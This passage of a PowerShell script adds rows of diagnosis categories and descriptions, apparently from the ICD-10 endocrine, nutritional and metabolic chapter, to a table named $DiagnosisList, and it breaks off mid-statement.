$DiagnosisList.Rows.Add("Other specified diabetes mellitus with hypoglycemia","Other specified diabetes mellitus with hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with hyperglycemia","Other specified diabetes mellitus with hyperglycemia") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with other specified complication","Other specified diabetes mellitus with other specified complication") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus with unspecified complications","Other specified diabetes mellitus with unspecified complications") + $null = $DiagnosisList.Rows.Add("Other specified diabetes mellitus without complications","Other specified diabetes mellitus without complications") + $null = $DiagnosisList.Rows.Add("Nondiabetic hypoglycemic coma","Nondiabetic hypoglycemic coma") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Drug-induced hypoglycemia without coma") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Other hypoglycemia") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Hypoglycemia, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Increased secretion of glucagon") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Increased secretion of gastrin") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Other specified disorders of pancreatic internal secretion") + $null = $DiagnosisList.Rows.Add("Other disorders of pancreatic internal secretion","Disorder of pancreatic internal secretion, unspecified") + $null = $DiagnosisList.Rows.Add("Hypoparathyroidism","Idiopathic hypoparathyroidism") + $null = $DiagnosisList.Rows.Add("Hypoparathyroidism","Pseudohypoparathyroidism") + $null = $DiagnosisList.Rows.Add("Hypoparathyroidism","Other hypoparathyroidism") + $null = $DiagnosisList.Rows.Add("Hypoparathyroidism","Hypoparathyroidism, unspecified") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Primary hyperparathyroidism") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Secondary hyperparathyroidism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Other hyperparathyroidism") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Hyperparathyroidism, unspecified") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Other specified disorders of parathyroid gland") + $null = $DiagnosisList.Rows.Add("Hyperparathyroidism and other disorders of parathyroid gland","Disorder of parathyroid gland, unspecified") + $null = $DiagnosisList.Rows.Add("Hyperfunction of pituitary gland","Acromegaly and pituitary gigantism") + $null = $DiagnosisList.Rows.Add("Hyperfunction of pituitary gland","Hyperprolactinemia") + $null = $DiagnosisList.Rows.Add("Hyperfunction of pituitary gland","Syndrome of inappropriate secretion of antidiuretic hormone") + $null = $DiagnosisList.Rows.Add("Hyperfunction of pituitary gland","Other hyperfunction of pituitary gland") + $null = $DiagnosisList.Rows.Add("Hyperfunction of pituitary gland","Hyperfunction of pituitary gland, unspecified") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Hypopituitarism") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Drug-induced hypopituitarism") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Diabetes insipidus") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Hypothalamic dysfunction, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Other disorders of pituitary gland") + $null = $DiagnosisList.Rows.Add("Hypofunction and other disorders of the pituitary gland","Disorder of pituitary gland, unspecified") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Pituitary-dependent Cushing's disease") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Nelson's syndrome") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Drug-induced Cushing's syndrome") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Ectopic ACTH syndrome") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Alcohol-induced pseudo-Cushing's syndrome") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Other Cushing's syndrome") + $null = $DiagnosisList.Rows.Add("Cushing's syndrome","Cushing's syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Adrenogenital disorders","Congenital adrenogenital disorders associated with enzyme deficiency") + $null = $DiagnosisList.Rows.Add("Adrenogenital disorders","Other adrenogenital disorders") + $null = $DiagnosisList.Rows.Add("Adrenogenital disorders","Adrenogenital disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Primary hyperaldosteronism","Conn's syndrome") + $null = $DiagnosisList.Rows.Add("Primary hyperaldosteronism","Glucocorticoid-remediable aldosteronism") + $null = $DiagnosisList.Rows.Add("Primary hyperaldosteronism","Other primary hyperaldosteronism") + $null = $DiagnosisList.Rows.Add("Secondary hyperaldosteronism","Secondary hyperaldosteronism") + $null = $DiagnosisList.Rows.Add("Other hyperaldosteronism","Bartter's syndrome") + $null = $DiagnosisList.Rows.Add("Other hyperaldosteronism","Other hyperaldosteronism") + $null = $DiagnosisList.Rows.Add("Hyperaldosteronism, unspecified","Hyperaldosteronism, unspecified") + $null = $DiagnosisList.Rows.Add("Other disorders of adrenal gland","Other adrenocortical overactivity") + $null = $DiagnosisList.Rows.Add("Other disorders of adrenal gland","Primary adrenocortical insufficiency") + $null = $DiagnosisList.Rows.Add("Other disorders of adrenal gland","Addisonian crisis") + $null = $DiagnosisList.Rows.Add("Other disorders of adrenal gland","Drug-induced adrenocortical insufficiency") + $null = $DiagnosisList.Rows.Add("Other and unspecified adrenocortical insufficiency","Unspecified adrenocortical insufficiency") + $null = $DiagnosisList.Rows.Add("Other and unspecified adrenocortical insufficiency","Other adrenocortical insufficiency") + $null = $DiagnosisList.Rows.Add("Adrenomedullary hyperfunction","Adrenomedullary hyperfunction") + $null = $DiagnosisList.Rows.Add("Other specified disorders of adrenal gland","Other specified disorders of adrenal gland") + $null = $DiagnosisList.Rows.Add("Disorder of adrenal gland, unspecified","Disorder of adrenal gland, unspecified") + $null = $DiagnosisList.Rows.Add("Ovarian dysfunction","Estrogen excess") + $null = $DiagnosisList.Rows.Add("Ovarian dysfunction","Androgen excess") + $null = $DiagnosisList.Rows.Add("Ovarian dysfunction","Polycystic ovarian syndrome") + $null = $DiagnosisList.Rows.Add("Premature menopause","Symptomatic premature menopause") + $null = $DiagnosisList.Rows.Add("Premature menopause","Asymptomatic premature menopause") + $null = $DiagnosisList.Rows.Add("Other primary ovarian failure","Other primary ovarian failure") + $null = $DiagnosisList.Rows.Add("Other ovarian dysfunction","Other ovarian dysfunction") + $null = $DiagnosisList.Rows.Add("Ovarian dysfunction, unspecified","Ovarian dysfunction, unspecified") + $null = $DiagnosisList.Rows.Add("Testicular dysfunction","Testicular hyperfunction") + $null = $DiagnosisList.Rows.Add("Testicular dysfunction","Testicular hypofunction") + $null = $DiagnosisList.Rows.Add("Testicular dysfunction","Other testicular dysfunction") + $null = $DiagnosisList.Rows.Add("Testicular dysfunction","Testicular dysfunction, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of puberty, not elsewhere classified","Delayed puberty") + $null = $DiagnosisList.Rows.Add("Disorders of puberty, not elsewhere classified","Precocious puberty") + $null = $DiagnosisList.Rows.Add("Disorders of puberty, not elsewhere classified","Other disorders of puberty") + $null = $DiagnosisList.Rows.Add("Disorders of puberty, not elsewhere classified","Disorder of puberty, unspecified") + $null = $DiagnosisList.Rows.Add("Polyglandular dysfunction","Autoimmune polyglandular failure") + $null = $DiagnosisList.Rows.Add("Polyglandular dysfunction","Polyglandular hyperfunction") + $null = $DiagnosisList.Rows.Add("Multiple endocrine neoplasia [MEN] syndromes","Multiple endocrine neoplasia [MEN] syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Multiple endocrine neoplasia [MEN] syndromes","Multiple endocrine neoplasia [MEN] type I") + $null = $DiagnosisList.Rows.Add("Multiple endocrine neoplasia [MEN] syndromes","Multiple endocrine neoplasia [MEN] type IIA") + $null = $DiagnosisList.Rows.Add("Multiple endocrine neoplasia [MEN] syndromes","Multiple endocrine neoplasia [MEN] type IIB") + $null = $DiagnosisList.Rows.Add("Other polyglandular dysfunction","Other polyglandular dysfunction") + $null = $DiagnosisList.Rows.Add("Polyglandular dysfunction, unspecified","Polyglandular dysfunction, unspecified") + $null = $DiagnosisList.Rows.Add("Diseases of thymus","Persistent hyperplasia of thymus") + $null = $DiagnosisList.Rows.Add("Diseases of thymus","Abscess of thymus") + $null = $DiagnosisList.Rows.Add("Diseases of thymus","Other diseases of thymus") + $null = $DiagnosisList.Rows.Add("Diseases of thymus","Disease of thymus, unspecified") + $null = $DiagnosisList.Rows.Add("Other endocrine disorders","Carcinoid syndrome") + $null = $DiagnosisList.Rows.Add("Other endocrine disorders","Other hypersecretion of intestinal hormones") + $null = $DiagnosisList.Rows.Add("Other endocrine disorders","Ectopic hormone secretion, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other endocrine disorders","Short stature due to endocrine disorder") + $null = $DiagnosisList.Rows.Add("Other endocrine disorders","Constitutional tall stature") + $null = $DiagnosisList.Rows.Add("Androgen insensitivity syndrome","Androgen insensitivity syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Androgen insensitivity syndrome","Complete androgen insensitivity syndrome") + $null = $DiagnosisList.Rows.Add("Androgen insensitivity syndrome","Partial androgen insensitivity syndrome") + $null = $DiagnosisList.Rows.Add("Other specified endocrine disorders","Other specified endocrine disorders") + $null = $DiagnosisList.Rows.Add("Endocrine disorder, unspecified","Endocrine disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of endocrine glands in diseases classified elsewhere","Disorders of endocrine glands in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of an endocrine system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of an endocrine system organ or structure complicating an endocrine system procedure") + $null = $DiagnosisList.Rows.Add("Intraoperative hemorrhage and hematoma of an endocrine system organ or structure complicating a procedure","Intraoperative hemorrhage and hematoma of an endocrine system organ or structure complicating other procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of an endocrine system organ or structure during a procedure","Accidental puncture and laceration of an endocrine system organ or structure during an endocrine system procedure") + $null = $DiagnosisList.Rows.Add("Accidental puncture and laceration of an endocrine system organ or structure during a procedure","Accidental puncture and laceration of an endocrine system organ or structure during other procedure") + $null = $DiagnosisList.Rows.Add("Other intraoperative complications of endocrine system","Other intraoperative complications of endocrine system") + $null = $DiagnosisList.Rows.Add("Kwashiorkor","Kwashiorkor") + $null = $DiagnosisList.Rows.Add("Nutritional marasmus","Nutritional marasmus") + $null = $DiagnosisList.Rows.Add("Marasmic kwashiorkor","Marasmic kwashiorkor") + $null = $DiagnosisList.Rows.Add("Unspecified severe protein-calorie malnutrition","Unspecified severe protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Protein-calorie malnutrition of moderate and mild degree","Moderate protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Protein-calorie malnutrition of moderate and mild degree","Mild protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Retarded development following protein-calorie malnutrition","Retarded development following protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Unspecified protein-calorie malnutrition","Unspecified protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with conjunctival xerosis") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with Bitot's spot and conjunctival xerosis") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with corneal xerosis") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with corneal ulceration and xerosis") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with keratomalacia") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with night blindness") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency with xerophthalmic scars of cornea") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Other ocular manifestations of vitamin A deficiency") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Other manifestations of vitamin A deficiency") + $null = $DiagnosisList.Rows.Add("Vitamin A deficiency","Vitamin A deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Beriberi","Dry beriberi") + $null = $DiagnosisList.Rows.Add("Beriberi","Wet beriberi") + $null = $DiagnosisList.Rows.Add("Wernicke's encephalopathy","Wernicke's encephalopathy") + $null = $DiagnosisList.Rows.Add("Other manifestations of thiamine deficiency","Other manifestations of thiamine deficiency") + $null = $DiagnosisList.Rows.Add("Thiamine deficiency, unspecified","Thiamine deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Niacin deficiency [pellagra]","Niacin deficiency [pellagra]") + $null = $DiagnosisList.Rows.Add("Deficiency of other B group vitamins","Riboflavin deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other B group vitamins","Pyridoxine deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other B group vitamins","Deficiency of other specified B group vitamins") + $null = $DiagnosisList.Rows.Add("Deficiency of other B group vitamins","Vitamin B deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Ascorbic acid deficiency","Ascorbic acid deficiency") + $null = $DiagnosisList.Rows.Add("Vitamin D deficiency","Rickets, active") + $null = $DiagnosisList.Rows.Add("Vitamin D deficiency","Vitamin D deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Other vitamin deficiencies","Deficiency of vitamin E") + $null = $DiagnosisList.Rows.Add("Other vitamin deficiencies","Deficiency of vitamin K") + $null = $DiagnosisList.Rows.Add("Other vitamin deficiencies","Deficiency of other vitamins") + $null = $DiagnosisList.Rows.Add("Other vitamin deficiencies","Vitamin deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Dietary calcium deficiency","Dietary calcium deficiency") + $null = $DiagnosisList.Rows.Add("Dietary selenium deficiency","Dietary selenium deficiency") + $null = $DiagnosisList.Rows.Add("Dietary zinc deficiency","Dietary zinc deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Copper deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Iron deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Magnesium deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Manganese deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Chromium deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Molybdenum deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Vanadium deficiency") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Deficiency of multiple nutrient elements") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Deficiency of other specified nutrient elements") + $null = $DiagnosisList.Rows.Add("Deficiency of other nutrient elements","Deficiency of nutrient element, unspecified") + $null = $DiagnosisList.Rows.Add("Other nutritional deficiencies","Essential fatty acid [EFA] deficiency") + $null = $DiagnosisList.Rows.Add("Other nutritional deficiencies","Imbalance of constituents of food intake") + $null = $DiagnosisList.Rows.Add("Other nutritional deficiencies","Other specified nutritional deficiencies") + $null = $DiagnosisList.Rows.Add("Other nutritional deficiencies","Nutritional deficiency, unspecified") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of protein-calorie malnutrition") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of vitamin A deficiency") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of vitamin C deficiency") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of rickets") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of other nutritional deficiencies") + $null = $DiagnosisList.Rows.Add("Sequelae of malnutrition and other nutritional deficiencies","Sequelae of unspecified nutritional deficiency") + $null = $DiagnosisList.Rows.Add("Localized adiposity","Localized adiposity") + $null = $DiagnosisList.Rows.Add("Obesity due to excess calories","Morbid (severe) obesity due to excess calories") + $null = $DiagnosisList.Rows.Add("Obesity due to excess calories","Other obesity due to excess calories") + $null = $DiagnosisList.Rows.Add("Drug-induced obesity","Drug-induced obesity") + $null = $DiagnosisList.Rows.Add("Morbid (severe) obesity with alveolar hypoventilation","Morbid (severe) obesity with alveolar hypoventilation") + $null = $DiagnosisList.Rows.Add("Overweight","Overweight") + $null = $DiagnosisList.Rows.Add("Other obesity","Other obesity") + $null = $DiagnosisList.Rows.Add("Obesity, unspecified","Obesity, unspecified") + $null = $DiagnosisList.Rows.Add("Other hyperalimentation","Hypervitaminosis A") + $null = $DiagnosisList.Rows.Add("Other hyperalimentation","Hypercarotinemia") + $null = $DiagnosisList.Rows.Add("Other hyperalimentation","Megavitamin-B6 syndrome") + $null = $DiagnosisList.Rows.Add("Other hyperalimentation","Hypervitaminosis D") + $null = $DiagnosisList.Rows.Add("Other hyperalimentation","Other specified hyperalimentation") + $null = $DiagnosisList.Rows.Add("Sequelae of hyperalimentation","Sequelae of hyperalimentation") + $null = $DiagnosisList.Rows.Add("Disorders of aromatic amino-acid metabolism","Classical phenylketonuria") + $null = $DiagnosisList.Rows.Add("Disorders of aromatic amino-acid metabolism","Other hyperphenylalaninemias") + $null = $DiagnosisList.Rows.Add("Disorders of tyrosine metabolism","Disorder of tyrosine metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of tyrosine metabolism","Tyrosinemia") + $null = $DiagnosisList.Rows.Add("Disorders of tyrosine metabolism","Other disorders of tyrosine metabolism") + $null = $DiagnosisList.Rows.Add("Albinism","Albinism, unspecified") + $null = $DiagnosisList.Rows.Add("Ocular albinism","X-linked ocular albinism") + $null = $DiagnosisList.Rows.Add("Ocular albinism","Autosomal recessive ocular albinism") + $null = $DiagnosisList.Rows.Add("Ocular albinism","Other ocular albinism") + $null = $DiagnosisList.Rows.Add("Ocular albinism","Ocular albinism, unspecified") + $null = $DiagnosisList.Rows.Add("Oculocutaneous albinism","Tyrosinase negative oculocutaneous albinism") + $null = $DiagnosisList.Rows.Add("Oculocutaneous albinism","Tyrosinase positive oculocutaneous albinism") + $null = $DiagnosisList.Rows.Add("Oculocutaneous albinism","Other oculocutaneous albinism") + $null = $DiagnosisList.Rows.Add("Oculocutaneous albinism","Oculocutaneous albinism, unspecified") + $null = $DiagnosisList.Rows.Add("Albinism with hematologic abnormality","Chediak-Higashi syndrome") + $null = $DiagnosisList.Rows.Add("Albinism with hematologic abnormality","Hermansky-Pudlak syndrome") + $null = $DiagnosisList.Rows.Add("Albinism with hematologic abnormality","Other albinism with hematologic abnormality") + $null = $DiagnosisList.Rows.Add("Albinism with hematologic abnormality","Albinism with hematologic abnormality, unspecified") + $null = $DiagnosisList.Rows.Add("Other specified albinism","Other specified albinism") + $null = $DiagnosisList.Rows.Add("Disorders of histidine metabolism","Disorders of histidine metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of histidine metabolism","Histidinemia") + $null = $DiagnosisList.Rows.Add("Disorders of histidine metabolism","Other disorders of histidine metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of tryptophan metabolism","Disorders of tryptophan metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of aromatic amino-acid metabolism","Other disorders of aromatic amino-acid metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of aromatic amino-acid metabolism, unspecified","Disorder of aromatic amino-acid metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of branched-chain amino-acid metabolism and fatty-acid metabolism","Maple-syrup-urine disease") + $null = $DiagnosisList.Rows.Add("Branched-chain organic acidurias","Isovaleric acidemia") + $null = $DiagnosisList.Rows.Add("Branched-chain organic acidurias","3-methylglutaconic aciduria") + $null = $DiagnosisList.Rows.Add("Branched-chain organic acidurias","Other branched-chain organic acidurias") + $null = $DiagnosisList.Rows.Add("Disorders of propionate metabolism","Methylmalonic acidemia") + $null = $DiagnosisList.Rows.Add("Disorders of propionate metabolism","Propionic acidemia") + $null = $DiagnosisList.Rows.Add("Disorders of propionate metabolism","Other disorders of propionate metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of branched-chain amino-acid metabolism","Other disorders of branched-chain amino-acid metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of branched-chain amino-acid metabolism, unspecified","Disorder of branched-chain amino-acid metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid metabolism","Disorder of fatty-acid metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Long chain/very long chain acyl CoA dehydrogenase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Medium chain acyl CoA dehydrogenase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Short chain acyl CoA dehydrogenase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Glutaric aciduria type II") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Muscle carnitine palmitoyltransferase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of fatty-acid oxidation","Other disorders of fatty-acid oxidation") + $null = $DiagnosisList.Rows.Add("Disorders of ketone metabolism","Disorders of ketone metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of fatty-acid metabolism","Other disorders of fatty-acid metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of carnitine metabolism","Disorder of carnitine metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of carnitine metabolism","Primary carnitine deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of carnitine metabolism","Carnitine deficiency due to inborn errors of metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of carnitine metabolism","Iatrogenic carnitine deficiency") + $null = $DiagnosisList.Rows.Add("Other secondary carnitine deficiency","Ruvalcaba-Myhre-Smith syndrome") + $null = $DiagnosisList.Rows.Add("Other secondary carnitine deficiency","Other secondary carnitine deficiency") + $null = $DiagnosisList.Rows.Add("Peroxisomal disorders","Peroxisomal disorder, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of peroxisome biogenesis","Zellweger syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of peroxisome biogenesis","Neonatal adrenoleukodystrophy") + $null = $DiagnosisList.Rows.Add("Disorders of peroxisome biogenesis","Other disorders of peroxisome biogenesis") + $null = $DiagnosisList.Rows.Add("X-linked adrenoleukodystrophy","Childhood cerebral X-linked adrenoleukodystrophy") + $null = $DiagnosisList.Rows.Add("X-linked adrenoleukodystrophy","Adolescent X-linked adrenoleukodystrophy") + $null = $DiagnosisList.Rows.Add("X-linked adrenoleukodystrophy","Adrenomyeloneuropathy") + $null = $DiagnosisList.Rows.Add("X-linked adrenoleukodystrophy","Other X-linked adrenoleukodystrophy") + $null = $DiagnosisList.Rows.Add("X-linked adrenoleukodystrophy","X-linked adrenoleukodystrophy, unspecified type") + $null = $DiagnosisList.Rows.Add("Other group 2 peroxisomal disorders","Other group 2 peroxisomal disorders") + $null = $DiagnosisList.Rows.Add("Other peroxisomal disorders","Rhizomelic chondrodysplasia punctata") + $null = $DiagnosisList.Rows.Add("Other peroxisomal disorders","Zellweger-like syndrome") + $null = $DiagnosisList.Rows.Add("Other peroxisomal disorders","Other group 3 peroxisomal disorders") + $null = $DiagnosisList.Rows.Add("Other peroxisomal disorders","Other peroxisomal disorders") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Disorders of amino-acid transport, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Cystinuria") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Hartnup's disease") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Lowe's syndrome") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Cystinosis") + $null = $DiagnosisList.Rows.Add("Disorders of amino-acid transport","Other disorders of amino-acid transport") + $null = $DiagnosisList.Rows.Add("Disorders of sulfur-bearing amino-acid metabolism","Disorders of sulfur-bearing amino-acid metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of sulfur-bearing amino-acid metabolism","Homocystinuria") + $null = $DiagnosisList.Rows.Add("Disorders of sulfur-bearing amino-acid metabolism","Methylenetetrahydrofolate reductase deficiency") + $null = $DiagnosisList.Rows.Add("Disorders of sulfur-bearing amino-acid metabolism","Other disorders of sulfur-bearing amino-acid metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of urea cycle metabolism","Disorder of urea cycle metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of urea cycle metabolism","Argininemia") + $null = $DiagnosisList.Rows.Add("Disorders of urea cycle metabolism","Arginosuccinic aciduria") + $null = $DiagnosisList.Rows.Add("Disorders of urea cycle metabolism","Citrullinemia") + $null = $DiagnosisList.Rows.Add("Disorders of urea cycle metabolism","Other disorders of urea cycle metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of lysine and hydroxylysine metabolism","Disorders of lysine and hydroxylysine metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of ornithine metabolism","Disorders of ornithine metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of glycine metabolism","Disorder of glycine metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of glycine metabolism","Non-ketotic hyperglycinemia") + $null = $DiagnosisList.Rows.Add("Disorders of glycine metabolism","Trimethylaminuria") + $null = $DiagnosisList.Rows.Add("Disorders of glycine metabolism","Hyperoxaluria") + $null = $DiagnosisList.Rows.Add("Disorders of glycine metabolism","Other disorders of glycine metabolism") + $null = $DiagnosisList.Rows.Add("Other specified disorders of amino-acid metabolism","Other specified disorders of amino-acid metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of amino-acid metabolism, unspecified","Disorder of amino-acid metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Lactose intolerance","Congenital lactase deficiency") + $null = $DiagnosisList.Rows.Add("Lactose intolerance","Secondary lactase deficiency") + $null = $DiagnosisList.Rows.Add("Lactose intolerance","Other lactose intolerance") + $null = $DiagnosisList.Rows.Add("Lactose intolerance","Lactose intolerance, unspecified") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","Glycogen storage disease, unspecified") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","von Gierke disease") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","Pompe disease") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","Cori disease") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","McArdle disease") + $null = $DiagnosisList.Rows.Add("Glycogen storage disease","Other glycogen storage disease") + $null = $DiagnosisList.Rows.Add("Disorders of fructose metabolism","Disorder of fructose metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of fructose metabolism","Essential fructosuria") + $null = $DiagnosisList.Rows.Add("Disorders of fructose metabolism","Hereditary fructose intolerance") + $null = $DiagnosisList.Rows.Add("Disorders of fructose metabolism","Other disorders of fructose metabolism") + $null = $DiagnosisList.Rows.Add("Disorders of galactose metabolism","Disorders of galactose metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("Disorders of galactose metabolism","Galactosemia") + $null = $DiagnosisList.Rows.Add("Disorders of galactose metabolism","Other disorders of galactose metabolism") + $null = $DiagnosisList.Rows.Add("Other disorders of intestinal carbohydrate absorption","Sucrase-isomaltase deficiency") + $null = $DiagnosisList.Rows.Add("Other disorders of intestinal carbohydrate absorption","Other disorders of intestinal carbohydrate absorption") + $null = $DiagnosisList.Rows.Add("Disorders of pyruvate metabolism and gluconeogenesis","Disorders of pyruvate metabolism and gluconeogenesis") + $null = $DiagnosisList.Rows.Add("Other specified disorders of carbohydrate metabolism","Other specified disorders of carbohydrate metabolism") + $null = $DiagnosisList.Rows.Add("Disorder of carbohydrate metabolism, unspecified","Disorder of carbohydrate metabolism, unspecified") + $null = $DiagnosisList.Rows.Add("GM2 gangliosidosis","GM2 gangliosidosis, unspecified") + $null = $DiagnosisList.Rows.Add("GM2 gangliosidosis","Sandhoff disease") + $null = $DiagnosisList.Rows.Add("GM2 gangliosidosis","Tay-Sachs disease") + $null = $DiagnosisList.Rows.Add("GM2 gangliosidosis","Other GM2 gangliosidosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified gangliosidosis","Unspecified gangliosidosis") + $null = $DiagnosisList.Rows.Add("Other and unspecified gangliosidosis","Mucolipidosis IV") + $null = $DiagnosisList.Rows.Add("Other and unspecified gangliosidosis","Other gangliosidosis") + $null = $DiagnosisList.Rows.Add("Other sphingolipidosis","Fabry (-Anderson) disease") + $null = $DiagnosisList.Rows.Add("Other sphingolipidosis","Gaucher disease") + $null = $DiagnosisList.Rows.Add("Other sphingolipidosis","Krabbe disease") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Niemann-Pick disease type A") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Niemann-Pick disease type B") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Niemann-Pick disease type C") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Niemann-Pick disease type D") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Other Niemann-Pick disease") + $null = $DiagnosisList.Rows.Add("Niemann-Pick disease","Niemann-Pick disease, unspecified") + $null = $DiagnosisList.Rows.Add("Metachromatic leukodystrophy","Metachromatic leukodystrophy") + $null = $DiagnosisList.Rows.Add("Other sphingolipidosis","Other sphingolipidosis") + $null = 